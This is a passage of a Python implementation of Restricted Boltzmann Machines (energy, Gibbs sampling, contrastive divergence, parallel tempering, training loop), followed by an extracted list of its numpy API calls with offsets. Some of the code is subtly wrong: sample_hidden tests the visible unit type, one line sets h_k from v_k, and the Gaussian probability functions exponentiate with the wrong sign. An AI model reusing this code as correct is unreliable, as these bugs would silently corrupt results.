# weight matrix
W = np.random.normal(0.0, 0.01, (num_visible, num_hidden))
# variances
v_sigma = np.ones(num_visible)
h_sigma = np.ones(num_hidden)
return v_bias, h_bias, v_sigma, h_sigma, W
def energy(self, v, h):
if self.visible_type == UnitType.BERNOULLI:
visible = np.matmul(v, self.v_bias)
elif self.visible_type == UnitType.GAUSSIAN:
visible = ((v - self.v_bias) ** 2) / (self.v_sigma ** 2
+ np.finfo(np.float32).eps)
visible = 0.5 * np.sum(visible, axis=1)
# term only dependent on hidden
if self.hidden_type == UnitType.BERNOULLI:
hidden = np.matmul(h, self.h_bias)
elif self.hidden_type == UnitType.GAUSSIAN:
hidden = ((h - self.h_bias) ** 2) / (self.h_sigma ** 2
+ np.finfo(np.float32).eps)
hidden = 0.5 * np.sum(hidden, axis=1)
# "covariance" term
# v^T W = sum_j( (v_j / sigma_j) W_{j \mu} )
covariance = np.matmul(v, self.W)
# v^T W h = sum_{\mu} h_{\mu} sum_j( (v_j / sigma_j) W_{j \mu} )
covariance = dot_batch(h, covariance)
return - (visible + hidden + covariance)
def mean_visible(self, h, beta=1.0):
r"""
Computes :math:`\mathbb{E}[\mathbf{v} \mid \mathbf{h}]`.
It can be shown that this expectation equals: [1]_
- Bernoulli:
.. math::
:nowrap:
\begin{equation}
\mathbb{E}[\mathbf{v} \mid \mathbf{h}] =
p \big( V_{i} = 1 \mid \mathbf{h} \big) = \text{sigmoid}
\Bigg( \beta \bigg( b_{i} + \sum_{\mu=1}^{|\mathcal{H}|} W_{i \mu} \frac{h_{\mu}}{\sigma_{\mu}} \bigg) \Bigg)
\end{equation}
- Gaussian:
.. math::
:nowrap:
\begin{equation*}
\mathbb{E}[\mathbf{v} \mid \mathbf{h}] = b_i + \sigma_i \sum_{\mu=1}^{|\mathcal{H}|} W_{i \mu} \frac{h_{\mu}}{\sigma_{\mu}}
\end{equation*}
where :math:`\sigma_{\mu} = 1` if :math:`H_\mu` is a Bernoulli random variable.
Notes
-----
Observe that the expectation when using Gaussian units is
independent of :math:`\beta`. To see the effect :math:`\beta` has
on the Gaussian case, see :func:`RBM.proba_visible`.
References
----------
.. [1] <NAME>., Restricted Boltzmann Machines, , (), (2018).
"""
mean = self.v_bias + (self.v_sigma *
np.matmul(h / self.h_sigma, self.W.T))
if self.visible_type == UnitType.BERNOULLI:
return sigmoid(mean * beta)
elif self.visible_type == UnitType.GAUSSIAN:
return mean
def mean_hidden(self, v, beta=1.0):
"Computes conditional expectation E[h | v]."
mean = self.h_bias + self.h_sigma * np.matmul(v / self.v_sigma, self.W)
if self.hidden_type == UnitType.BERNOULLI:
return sigmoid(mean * beta)
elif self.hidden_type == UnitType.GAUSSIAN:
return mean
def sample_visible(self, h, beta=1.0):
mean = self.mean_visible(h, beta=beta)
if self.visible_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
v = bernoulli_from_probas(mean)
elif self.visible_type == UnitType.GAUSSIAN:
v = np.random.normal(loc=mean,
scale=self.v_sigma ** 2 / beta,
size=mean.shape)
else:
raise ValueError(f"unknown type {self.visible_type}")
return v
def sample_hidden(self, v, beta=1.0):
mean = self.mean_hidden(v, beta=beta)
if self.visible_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
h = bernoulli_from_probas(mean)
elif self.visible_type == UnitType.GAUSSIAN:
h = np.random.normal(loc=mean,
scale=(self.h_sigma ** 2 / beta),
size=(mean.shape))
else:
raise ValueError(f"unknown type {self.visible_type}")
return h
def proba_visible(self, h, v=None, beta=1.0):
mean = self.mean_visible(h, beta=beta)
if self.visible_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
p = mean
elif self.visible_type == UnitType.GAUSSIAN:
z = np.clip((v - mean) ** 2 / (2.0 * self.v_sigma ** 2),
-30.0, 30.0)
z *= beta
p = (np.exp(z) / (np.sqrt(2 * np.pi) * self.v_sigma
+ np.finfo(np.float32).eps))
else:
raise ValueError(f"unknown type {self.visible_type}")
return p
def sample(self, v, beta=1.0):
return self.sample_visible(self.sample_hidden(v, beta=beta), beta=beta)
def proba_hidden(self, v, h=None, beta=1.0):
mean = self.mean_hidden(v, beta=beta)
if self.hidden_type == UnitType.BERNOULLI:
# E[v | h] = p(v | h) for Bernoulli
p = mean
elif self.hidden_type == UnitType.GAUSSIAN:
z = np.clip((h - mean) ** 2 / (2.0 * self.h_sigma ** 2),
-30.0, 30.0)
z *= beta
p = (np.exp(z) / (np.sqrt(2 * np.pi) * self.h_sigma
+ np.finfo(np.float32).eps))
else:
raise ValueError(f"unknown type {self.hidden_type}")
return p
def free_energy(self, v, beta=1.0, raw=False):
if self.hidden_type == UnitType.BERNOULLI:
hidden = self.h_bias + np.matmul((v / self.v_sigma), self.W)
hidden *= beta
hidden = - np.sum(np.log(1.0 + np.exp(np.clip(hidden, -30, 30))),
axis=1)
elif self.hidden_type == UnitType.GAUSSIAN:
# TODO: Implement
# Have the formulas, but gotta make sure yo!
hidden = np.sum(
1 / (2 * self.h_sigma) * (
self.h_bias ** 2
- (self.h_bias + self.h_sigma * np.matmul(v / self.v_sigma, self.W)) ** 2
),
axis=1
)
hidden -= 0.5 * self.num_hidden * np.log(2 * np.pi) + np.sum(np.log(self.h_sigma))
# raise NotImplementedError()
if self.visible_type == UnitType.BERNOULLI:
visible = - np.matmul(v, self.v_bias)
visible *= beta
elif self.visible_type == UnitType.GAUSSIAN:
visible = 0.5 * np.sum(
((v - self.v_bias) ** 2)
/ (self.v_sigma ** 2 / beta + np.finfo(np.float32).eps),
axis=1
)
else:
raise ValueError(f"unknown type {self.visible_type}")
# sum across batch to obtain log of joint-likelihood
if raw:
return hidden + visible
else:
return np.mean(hidden + visible)
def contrastive_divergence(self, v_0,
k=1,
h_0=None,
burnin=-1,
beta=1.0):
"""Contrastive Divergence.
Parameters
----------
v_0: array-like
Visible state to initialize the chain from.
k: int
Number of steps to use in CD-k.
h_0: array-like, optional
Visible states to initialize the chain.
If not specified, will sample conditioned on visisble.
Returns
-------
h_0, h, v_0, v: arrays
``h_0`` and ``v_0`` are the initial states for the hidden and
visible units, respectively.
``h`` and ``v`` are the final states for the hidden and
visible units, respectively.
"""
if h_0 is None:
h_0 = self.sample_hidden(v_0, beta=beta)
v = v_0
h = h_0
for t in range(k):
v = self.sample_visible(h, beta=beta)
h = self.sample_hidden(v, beta=beta)
return v_0, h_0, v, h
def reset_sampler(self):
if self.sampler_method == 'pcd':
self._prev = None
def _init_parallel_tempering(self, v, betas=None, num_temps=10, **kwargs):
# 1. Initialize list of samples
if betas is None:
n = num_temps
else:
n = len(betas)
return np.tile(v, (n, 1, 1))
def parallel_tempering(self, vs, hs=None,
k=1,
betas=None,
max_temp=100, num_temps=10,
include_negative_shift=False):
# TODO: Performing sampling in parallel, rather than using a loop
# 1. Allow `self.contrastive_divergence` to take on arrays of betas
# 2. Stack betas and initial samples
# 3. Perform sampling
# 4. Unstack
batch_size = vs[0].shape[0]
# 1. Initialize list of samples
if betas is None:
betas = np.linspace(1, max_temp, num_temps) ** (-1)
R = len(betas)
res = []
if include_negative_shift:
neg_res = []
# 2. Perform gibbs sampling for tempered distributions
for r in range(R):
v = vs[r]
if hs is not None:
h = hs[r]
else:
h = None
v_0, h_0, v_k, h_k = self.contrastive_divergence(
v,
k=k,
beta=betas[r],
h_0=h
)
res.append((v_k, h_k))
if include_negative_shift:
neg_res.append((v_0, h_0))
# 3. Simulated Annealing to perform swaps ("exchange particles")
for r in range(R - 1, 0, -1):
a = np.exp((betas[r] - betas[r - 1]) *
(self.energy(*res[r]) - self.energy(*res[r - 1])))
u = np.random.random(batch_size)
# acceptance mask
acc_mask = (u < a).reshape(batch_size, 1)
# reject mask
rej_mask = ~acc_mask
v = res[r][0] * acc_mask + res[r - 1][0] * rej_mask
h = res[r][1] * acc_mask + res[r - 1][1] * rej_mask
res[r - 1] = v, h
# TODO: this is useless, right? We're not ever using `res[r]` again
# in this iteration
v = res[r - 1][0] * acc_mask + res[r][0] * rej_mask
h = res[r - 1][1] * acc_mask + res[r][1] * rej_mask
res[r] = v, h
# warn user if very small/large number of samples rejected/accepted
# but don't if the `batch_size` is super small..
if r == 1 and batch_size > 2 and self._warned_acceptance < 10:
num_acc = acc_mask[acc_mask].shape[0]
if num_acc >= 0.9 * batch_size:
_log.warn(f"Large portion of tempered samples accepted ({num_acc} / {batch_size})")
self._warned_acceptance += 1
elif num_acc <= 0.1 * batch_size:
_log.warn(f"Small portion of tempered samples accepted ({num_acc} / {batch_size})")
self._warned_acceptance += 1
# possibly perform same for the negative shift
if include_negative_shift:
for r in range(R - 1, 0, -1):
a = np.exp((betas[r] - betas[r - 1]) *
(self.energy(*neg_res[r]) - self.energy(*neg_res[r - 1])))
u = np.random.random(batch_size)
# acceptance mask
acc_mask = (u < a).reshape(batch_size, 1)
# reject mask
rej_mask = ~acc_mask
v = neg_res[r][0] * acc_mask + neg_res[r - 1][0] * rej_mask
h = neg_res[r][1] * acc_mask + neg_res[r - 1][1] * rej_mask
neg_res[r - 1] = v, h
v = neg_res[r - 1][0] * acc_mask + neg_res[r][0] * rej_mask
h = neg_res[r - 1][1] * acc_mask + neg_res[r][1] * rej_mask
neg_res[r] = v, h
res_v = [r[0] for r in res]
res_h = [r[1] for r in res]
# return final state
if include_negative_shift:
neg_res_v = [r[0] for r in neg_res]
neg_res_h = [r[1] for r in neg_res]
return neg_res_v, neg_res_h, res_v, res_h
else:
return res_v, res_h
def _update(self, grad, lr=0.1):
# in case using `cupy`, can't use `np.shape`
# to obtain "shape" of single element; this is a fix
lr = np.asarray(lr)
gamma = lr
for i in range(len(self.variables)):
if lr.shape:
gamma = lr[i]
self.variables[i] -= gamma * grad[i]
def _apply_weight_decay(self, lmbda=0.01):
for i in range(len(self.variables)):
# default is gradient DEscent, so weight-decay also switches signs
self.variables[i] += lmbda * self.variables[i]
def step(self, v, k=1, lr=0.1, lmbda=0.0, **sampler_kwargs):
"Performs a single gradient DEscent step on the batch `v`."
# compute gradient for each observed visible configuration
grad = self.grad(v, k=k, **sampler_kwargs)
# update parameters
self._update(grad, lr=lr)
# possibly apply weight-decay
if lmbda > 0.0:
self._apply_weight_decay(lmbda=lmbda)
def reconstruct(self, v, num_samples=100):
samples = self.sample_visible(self.sample_hidden(v))
for _ in range(num_samples - 1):
samples += self.sample_visible(self.sample_hidden(v))
probs = samples / num_samples
return probs
def grad(self, v, burnin=-1, persist=False, **sampler_kwargs):
if self.sampler_method.lower() == 'cd':
v_0, h_0, v_k, h_k = self.contrastive_divergence(
v,
**sampler_kwargs
)
elif self.sampler_method.lower() == 'pcd':
# Persistent Contrastive Divergence
if self._prev is not None:
v_0, h_0 = self._prev
else:
# ``burnin`` specified, we perform this to initialize the chain
if burnin > 0:
_log.info(f"Performing burnin of {burnin} steps to initialize PCD")
_, _, h_0, v_0 = self.contrastive_divergence(v, k=burnin, **sampler_kwargs)
else:
h_0 = self.sample_hidden(v, **sampler_kwargs)
v_0 = v
v_0, h_0, v_k, h_k = self.contrastive_divergence(
v,
h_0=h_0,
**sampler_kwargs
)
# persist
self._prev = (v_k, h_k)
elif self.sampler_method.lower() == 'pt':
h_0 = None
if self._prev is not None:
v_0, h_0 = self._prev
else:
_log.info("Initializing PT chain...")
v_0 = self._init_parallel_tempering(v, **sampler_kwargs)
# FIXME: make compatible with `parallel_tempering` returning
# all the states
if h_0 is None:
v_0, h_0, v_k, h_k = self.parallel_tempering(
v_0,
hs=h_0,
include_negative_shift=True,
**sampler_kwargs
)
elif sampler_kwargs.get("include_negative_shift", False):
v_0, h_0, v_k, h_k = self.parallel_tempering(
v_0,
hs=h_0,
**sampler_kwargs
)
else:
# FIXME: make compatible with `parallel_tempering` returning
# all the states
v_k, h_k = self.parallel_tempering(
v_0,
hs=h_0,
**sampler_kwargs
)
if persist:
self._prev = (v_k, h_k)
# take the first tempered distribution, i.e. the one corresponding
# the target distribution
v_0 = v_0[0]
h_0 = h_0[0]
v_k = v_k[0]
h_k = v_k[0]
else:
raise ValueError(f"{self.sampler_method} is not supported")
# all expressions below using `v` or `mean_h` will contain
# AT LEAST one factor of `1 / v_sigma` and `1 / h_sigma`, respectively
# so we include those right away
v_0 = v_0 / self.v_sigma
v_k = v_k / self.v_sigma
mean_h_0 = self.mean_hidden(v_0) / self.h_sigma
mean_h_k = self.mean_hidden(v_k) / self.h_sigma
# Recall: `v_sigma` and `h_sigma` has no affect if they are set to 1
# v_0 / (v_sigma^2) - v_k / (v_sigma^2)
delta_v_bias = (v_0 - v_k) / self.v_sigma
# E[h_0 | v_0] / (h_sigma^2) - E[h_k | v_k] / (h_sigma^2)
delta_h_bias = (mean_h_0 - mean_h_k) / self.h_sigma
# Gradient wrt. W
# (v_0 / v_sigma) (1 / h_sigma) E[h_0 | v_0] - (v_k / v_sigma) (1 / h_sigma) E[h_k | v_k]
x = mean_h_0.reshape(mean_h_0.shape[0], 1, mean_h_0.shape[1])
y = v_0.reshape(v_0.shape[0], v_0.shape[1], 1)
z_0 = np.matmul(y, x)
x = mean_h_k.reshape(mean_h_k.shape[0], 1, mean_h_k.shape[1])
y = v_k.reshape(v_k.shape[0], v_k.shape[1], 1)
z_k = np.matmul(y, x)
delta_W = z_0 - z_k
# average over batch take the negative
delta_v_bias = - np.mean(delta_v_bias, axis=0)
delta_h_bias = - np.mean(delta_h_bias, axis=0)
delta_W = - np.mean(delta_W, axis=0)
grads = [delta_v_bias, delta_h_bias, delta_W]
# variances
if self.visible_type == UnitType.GAUSSIAN \
and self.estimate_visible_sigma:
# in `GaussianRBM`, where only VISIBLE units Gaussian,
# we only compute `v_sigma`
# (((v_0 - b)^2 / (v_sigma^2)) - (v / (v_sigma)) \sum_{\mu} E[h_{\mu} | v] / sigma_{\mu}) / v_sigma
delta_v_sigma_data = (((v_0 - (self.v_bias / self.v_sigma)) ** 2)
- v_0 * (np.matmul(mean_h_0, self.W.T)))
delta_v_sigma_model = (((v_k - (self.v_bias / self.v_sigma)) ** 2)
- v_k * (np.matmul(mean_h_k, self.W.T)))
delta_v_sigma = (delta_v_sigma_data - delta_v_sigma_model) / self.v_sigma
# average over batch take the negative
delta_v_sigma = - np.mean(delta_v_sigma, axis=0)
grads.append(delta_v_sigma)
if self.hidden_type == UnitType.GAUSSIAN \
and self.estimate_hidden_sigma:
# TODO: Implement
raise NotImplementedError("gradients for gaussian hidden"
" units not yet implemented")
delta_h_sigma_data = (((h_0 - (self.h_bias / self.h_sigma)) ** 2)
- h_0 * (np.matmul(mean_h_0, self.W.T)))
delta_h_sigma_model = (((h_k - (self.h_bias / self.h_sigma)) ** 2)
- h_k * (np.matmul(mean_h_k, self.W.T)))
delta_h_sigma = delta_h_sigma_data - delta_h_sigma_model
# average over batch take the negative
delta_h_sigma = - np.mean(delta_h_sigma, axis=0)
grads.append(delta_h_sigma)
return grads
def fit(self, train_data,
k=1,
learning_rate=0.01,
num_epochs=5,
batch_size=64,
test_data=None,
show_progress=True,
weight_decay=0.0,
early_stopping=-1,
callbacks={},
**sampler_kwargs):
"""
Parameters
----------
train_data: array-like
Data to fit RBM on.
k: int, default=1
Number of sampling steps to perform. Used by CD-k, PCD-k and PT.
learning_rate: float or array, default=0.01
Learning rate used when updating the parameters.
Can also be array of same length as `self.variables`, in
which case the learning rate at index `i` will be used to
to update ``RBM.variables[i]``.
num_epochs: int, default=5
Number of epochs to train.
batch_size: int, default=64
Batch size to within the epochs.
test_data: array-like, default=None
Data similar to ``train_data``, but this will only be used as
validation data, not trained on.
If specified, will compute and print the free energy / negative
log-likelihood on this dataset after each epoch.
show_progress: bool, default=True
If true, will display progress bar for each epoch.
weight_decay: float, default=0.0
If greater than 0.0, weight decay will be applied to the
parameter updates. See :func:`RBM.step` for more information.
early_stopping: int, default=-1
If ``test_data`` is given and ``early_stopping > 0``, training
will terminate after epoch if the free energy of the
``test_data`` did not improve over the fast ``early_stopping``
epochs.
Returns
-------
nlls_train, nlls_test : array-like, array-like
Returns the free energy of both ``train_data`` and ``test_data``
as computed at each epoch.
"""
num_samples = train_data.shape[0]
indices = np.arange(num_samples)
np.random.shuffle(indices)
nlls_train = []
nlls = []
prev_best = None
for epoch in range(1, num_epochs + 1):
if "pre_epoch" in callbacks:
for c in callbacks["pre_epoch"]:
c(self, epoch)
# reset sampler at beginning of epoch
# Used by methods such as PCD to reset the
# initialization value.
self.reset_sampler()
# compute train & test negative log-likelihood
# TODO: compute train- and test-nll in mini-batches
# to avoid numerical problems
nll_train = float(np.mean(self.free_energy(train_data)))
nlls_train.append(nll_train)
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (train):"
f" {nll_train:>20.5f}")
if test_data is not None:
nll = float(np.mean(self.free_energy(test_data)))
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (test):"
f" {nll:>20.5f}")
nlls.append(nll)
# stop early if all `early_stopping` previous
# evaluations on `test_data` did not improve.
if early_stopping > 0:
if epoch > early_stopping and \
np.all([a >= prev_best for a in nlls[epoch - early_stopping:]]):
_log.info("Hasn't improved in {early_stopping} epochs; stopping early")
break
else:
# update `prev_best`
if prev_best is None:
prev_best = nll
elif nll < prev_best:
prev_best = nll
# iterate through dataset in batches
if show_progress:
bar = tqdm(total=num_samples)
for start in range(0, num_samples, batch_size):
# ensure we don't go out-of-bounds
end = min(start + batch_size, num_samples)
# take a gradient-step
self.step(train_data[start: end],
k=k,
lr=learning_rate,
lmbda=weight_decay,
**sampler_kwargs)
if "post_step" in callbacks:
for c in callbacks["post_step"]:
c(self, epoch, end)
# update progress
if show_progress:
bar.update(end - start)
if show_progress:
bar.close()
# shuffle indices for next epoch
np.random.shuffle(indices)
if "post_epoch" in callbacks:
for c in callbacks["post_epoch"]:
c(self, epoch)
# compute train & test negative log-likelihood of final batch
nll_train = float(np.mean(self.free_energy(train_data)))
nlls_train.append(nll_train)
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (train): "
f"{nll_train:>20.5f}")
if test_data is not None:
nll = float(np.mean(self.free_energy(test_data)))
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (test): "
f"{nll:>20.5f}")
nlls.append(nll)
return nlls_train, nlls
def dump(self, path, *attrs):
import pickle
if not attrs:
attrs = [
'num_visible',
'num_hidden',
'visible_type',
'hidden_type',
'estimate_visible_sigma',
'estimate_hidden_sigma',
'variables',
'v_bias',
'h_bias',
'W',
'v_sigma',
'h_sigma'
]
state = {}
for a in attrs:
state[a] = getattr(self, a)
with open(path, "wb") as f:
pickle.dump(state, f)
@classmethod
def load(cls, path):
import pickle
with open(path, "rb") as f:
state = pickle.load(f)
model = cls(num_visible=state['num_visible'],
num_hidden=state['num_hidden'],
visible_type=state['visible_type'],
hidden_type=state['hidden_type'],
estimate_visible_sigma=state['estimate_visible_sigma'],
estimate_hidden_sigma=state['estimate_hidden_sigma'])
for a in state:
setattr(model, a, state[a])
return model
class BernoulliRBM(RBM):
"""Restricted Boltzmann Machine (RBM) with both hidden and visible
variables assumed to be Bernoulli random variables.
"""
def __init__(self, num_visible, num_hidden):
super(BernoulliRBM, self).__init__(
num_visible,
num_hidden,
visible_type='bernoulli',
hidden_type='bernoulli'
)
| [
"logging.getLogger",
"ml.np.all",
"ml.np.random.shuffle",
"ml.np.matmul",
"ml.np.ones",
"ml.np.tile",
"ml.np.zeros",
"ml.np.linspace",
"ml.np.arange",
"ml.np.log",
"ml.np.mean",
"ml.functions.bernoulli_from_probas",
"ml.np.sqrt",
"ml.np.random.normal",
"ml.np.exp",
"pickle.load",
"ml... | [((165, 188), 'logging.getLogger', 'logging.getLogger', (['"""ml"""'], {}), "('ml')\n", (182, 188), False, 'import logging\n'), ((3675, 3696), 'ml.np.zeros', 'np.zeros', (['num_visible'], {}), '(num_visible)\n', (3683, 3696), False, 'from ml import np\n'), ((3714, 3734), 'ml.np.zeros', 'np.zeros', (['num_hidden'], {}), '(num_hidden)\n', (3722, 3734), False, 'from ml import np\n'), ((3772, 3826), 'ml.np.random.normal', 'np.random.normal', (['(0.0)', '(0.01)', '(num_visible, num_hidden)'], {}), '(0.0, 0.01, (num_visible, num_hidden))\n', (3788, 3826), False, 'from ml import np\n'), ((3866, 3886), 'ml.np.ones', 'np.ones', (['num_visible'], {}), '(num_visible)\n', (3873, 3886), False, 'from ml import np\n'), ((3905, 3924), 'ml.np.ones', 'np.ones', (['num_hidden'], {}), '(num_hidden)\n', (3912, 3924), False, 'from ml import np\n'), ((4845, 4865), 'ml.np.matmul', 'np.matmul', (['v', 'self.W'], {}), '(v, self.W)\n', (4854, 4865), False, 'from ml import np\n'), ((4960, 4984), 'ml.functions.dot_batch', 'dot_batch', (['h', 'covariance'], {}), '(h, covariance)\n', (4969, 4984), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((12299, 12320), 'ml.np.tile', 'np.tile', (['v', '(n, 1, 1)'], {}), '(v, (n, 1, 1))\n', (12306, 12320), False, 'from ml import np\n'), ((16453, 16467), 'ml.np.asarray', 'np.asarray', (['lr'], {}), '(lr)\n', (16463, 16467), False, 'from ml import np\n'), ((21117, 21132), 'ml.np.matmul', 'np.matmul', (['y', 'x'], {}), '(y, x)\n', (21126, 21132), False, 'from ml import np\n'), ((21273, 21288), 'ml.np.matmul', 'np.matmul', (['y', 'x'], {}), '(y, x)\n', (21282, 21288), False, 'from ml import np\n'), ((25354, 25376), 'ml.np.arange', 'np.arange', (['num_samples'], {}), '(num_samples)\n', (25363, 25376), False, 'from ml import np\n'), ((25385, 25411), 'ml.np.random.shuffle', 'np.random.shuffle', (['indices'], {}), '(indices)\n', (25402, 25411), False, 'from ml import np\n'), ((4080, 4105), 'ml.np.matmul', 'np.matmul', (['v', 'self.v_bias'], {}), '(v, self.v_bias)\n', (4089, 4105), False, 'from ml import np\n'), ((4470, 4495), 'ml.np.matmul', 'np.matmul', (['h', 'self.h_bias'], {}), '(h, self.h_bias)\n', (4479, 4495), False, 'from ml import np\n'), ((6471, 6491), 'ml.functions.sigmoid', 'sigmoid', (['(mean * beta)'], {}), '(mean * beta)\n', (6478, 6491), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((6813, 6833), 'ml.functions.sigmoid', 'sigmoid', (['(mean * beta)'], {}), '(mean * beta)\n', (6820, 6833), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((7117, 7144), 'ml.functions.bernoulli_from_probas', 'bernoulli_from_probas', (['mean'], {}), '(mean)\n', (7138, 7144), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((7659, 7686), 'ml.functions.bernoulli_from_probas', 'bernoulli_from_probas', (['mean'], {}), '(mean)\n', (7680, 7686), False, 'from ml.functions import sigmoid, dot_batch, bernoulli_from_probas\n'), ((10805, 10830), 'ml.np.mean', 'np.mean', (['(hidden + visible)'], {}), '(hidden + visible)\n', (10812, 10830), False, 'from ml import np\n'), ((13821, 13849), 'ml.np.random.random', 'np.random.random', (['batch_size'], {}), '(batch_size)\n', (13837, 13849), False, 'from ml import np\n'), ((21391, 21420), 'ml.np.mean', 'np.mean', (['delta_v_bias'], {'axis': '(0)'}), '(delta_v_bias, axis=0)\n', (21398, 21420), False, 'from ml import np\n'), ((21446, 21475), 'ml.np.mean', 'np.mean', (['delta_h_bias'], {'axis': '(0)'}), '(delta_h_bias, axis=0)\n', (21453, 21475), False, 'from ml import np\n'), ((21496, 21520), 'ml.np.mean', 'np.mean', (['delta_W'], {'axis': '(0)'}), '(delta_W, axis=0)\n', (21503, 21520), False, 'from ml import np\n'), ((28084, 28110), 'ml.np.random.shuffle', 'np.random.shuffle', (['indices'], {}), '(indices)\n', (28101, 28110), False, 'from ml import np\n'), ((29403, 29424), 'pickle.dump', 'pickle.dump', (['state', 'f'], {}), '(state, f)\n', (29414, 29424), False, 'import pickle\n'), ((29547, 29561), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (29558, 29561), False, 'import pickle\n'), ((6361, 6398), 'ml.np.matmul', 'np.matmul', (['(h / self.h_sigma)', 'self.W.T'], {}), '(h / self.h_sigma, self.W.T)\n', (6370, 6398), False, 'from ml import np\n'), ((6707, 6742), 'ml.np.matmul', 'np.matmul', (['(v / self.v_sigma)', 'self.W'], {}), '(v / self.v_sigma, self.W)\n', (6716, 6742), False, 'from ml import np\n'), ((7214, 7289), 'ml.np.random.normal', 'np.random.normal', ([], {'loc': 'mean', 'scale': '(self.v_sigma ** 2 / beta)', 'size': 'mean.shape'}), '(loc=mean, scale=self.v_sigma ** 2 / beta, size=mean.shape)\n', (7230, 7289), False, 'from ml import np\n'), ((7756, 7831), 'ml.np.random.normal', 'np.random.normal', ([], {'loc': 'mean', 'scale': '(self.h_sigma ** 2 / beta)', 'size': 'mean.shape'}), '(loc=mean, scale=self.h_sigma ** 2 / beta, size=mean.shape)\n', (7772, 7831), False, 'from ml import np\n'), ((8288, 8353), 'ml.np.clip', 'np.clip', (['((v - mean) ** 2 / (2.0 * self.v_sigma ** 2))', '(-30.0)', '(30.0)'], {}), '((v - mean) ** 2 / (2.0 * self.v_sigma ** 2), -30.0, 30.0)\n', (8295, 8353), False, 'from ml import np\n'), ((9021, 9086), 'ml.np.clip', 'np.clip', (['((h - mean) ** 2 / (2.0 * self.h_sigma ** 2))', '(-30.0)', '(30.0)'], {}), '((h - mean) ** 2 / (2.0 * self.h_sigma ** 2), -30.0, 30.0)\n', (9028, 9086), False, 'from ml import np\n'), ((9491, 9526), 'ml.np.matmul', 'np.matmul', (['(v / self.v_sigma)', 'self.W'], {}), '(v / self.v_sigma, self.W)\n', (9500, 9526), False, 'from ml import np\n'), ((10284, 10309), 'ml.np.matmul', 'np.matmul', (['v', 'self.v_bias'], {}), '(v, self.v_bias)\n', (10293, 10309), False, 'from ml import np\n'), ((12921, 12956), 'ml.np.linspace', 'np.linspace', (['(1)', 'max_temp', 'num_temps'], {}), '(1, max_temp, num_temps)\n', (12932, 12956), False, 'from ml import np\n'), ((15388, 15416), 'ml.np.random.random', 'np.random.random', (['batch_size'], {}), '(batch_size)\n', (15404, 15416), False, 'from ml import np\n'), ((22367, 22397), 'ml.np.mean', 'np.mean', (['delta_v_sigma'], {'axis': '(0)'}), '(delta_v_sigma, axis=0)\n', (22374, 22397), False, 'from ml import np\n'), ((23141, 23171), 'ml.np.mean', 'np.mean', (['delta_h_sigma'], {'axis': '(0)'}), '(delta_h_sigma, axis=0)\n', (23148, 23171), False, 'from ml import np\n'), ((27262, 27285), 'tqdm.tqdm', 'tqdm', ([], {'total': 'num_samples'}), '(total=num_samples)\n', (27266, 27285), False, 'from tqdm import tqdm\n'), ((4333, 4356), 'ml.np.sum', 'np.sum', (['visible'], {'axis': '(1)'}), '(visible, axis=1)\n', (4339, 4356), False, 'from ml import np\n'), ((4719, 4741), 'ml.np.sum', 'np.sum', (['hidden'], {'axis': '(1)'}), '(hidden, axis=1)\n', (4725, 4741), False, 'from ml import np\n'), ((8417, 8426), 'ml.np.exp', 'np.exp', (['z'], {}), '(z)\n', (8423, 8426), False, 'from ml import np\n'), ((9150, 9159), 'ml.np.exp', 'np.exp', (['z'], {}), '(z)\n', (9156, 9159), False, 'from ml import np\n'), ((22023, 22052), 'ml.np.matmul', 'np.matmul', (['mean_h_0', 'self.W.T'], {}), '(mean_h_0, self.W.T)\n', (22032, 22052), False, 'from ml import np\n'), ((22168, 22197), 'ml.np.matmul', 'np.matmul', (['mean_h_k', 'self.W.T'], {}), '(mean_h_k, self.W.T)\n', (22177, 22197), False, 'from ml import np\n'), ((22814, 22843), 'ml.np.matmul', 'np.matmul', (['mean_h_0', 'self.W.T'], {}), '(mean_h_0, self.W.T)\n', (22823, 22843), False, 'from ml import np\n'), ((22959, 22988), 'ml.np.matmul', 'np.matmul', (['mean_h_k', 'self.W.T'], {}), '(mean_h_k, self.W.T)\n', (22968, 22988), False, 'from ml import np\n'), ((10116, 10133), 'ml.np.log', 'np.log', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (10122, 10133), False, 'from ml import np\n'), ((10143, 10163), 'ml.np.log', 'np.log', (['self.h_sigma'], {}), '(self.h_sigma)\n', (10149, 10163), False, 'from ml import np\n'), ((26718, 26783), 'ml.np.all', 'np.all', (['[(a >= prev_best) for a in nlls[epoch - early_stopping:]]'], {}), '([(a >= prev_best) for a in nlls[epoch - early_stopping:]])\n', (26724, 26783), False, 'from ml import np\n'), ((4279, 4299), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (4287, 4299), False, 'from ml import np\n'), ((4666, 4686), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (4674, 4686), False, 'from ml import np\n'), ((8430, 8448), 'ml.np.sqrt', 'np.sqrt', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (8437, 8448), False, 'from ml import np\n'), ((8496, 8516), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (8504, 8516), False, 'from ml import np\n'), ((9163, 9181), 'ml.np.sqrt', 'np.sqrt', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (9170, 9181), False, 'from ml import np\n'), ((9229, 9249), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (9237, 9249), False, 'from ml import np\n'), ((9606, 9630), 'ml.np.clip', 'np.clip', (['hidden', '(-30)', '(30)'], {}), '(hidden, -30, 30)\n', (9613, 9630), False, 'from ml import np\n'), ((10514, 10534), 'ml.np.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (10522, 10534), False, 'from ml import np\n'), ((9972, 10007), 'ml.np.matmul', 'np.matmul', (['(v / self.v_sigma)', 'self.W'], {}), '(v / self.v_sigma, self.W)\n', (9981, 10007), 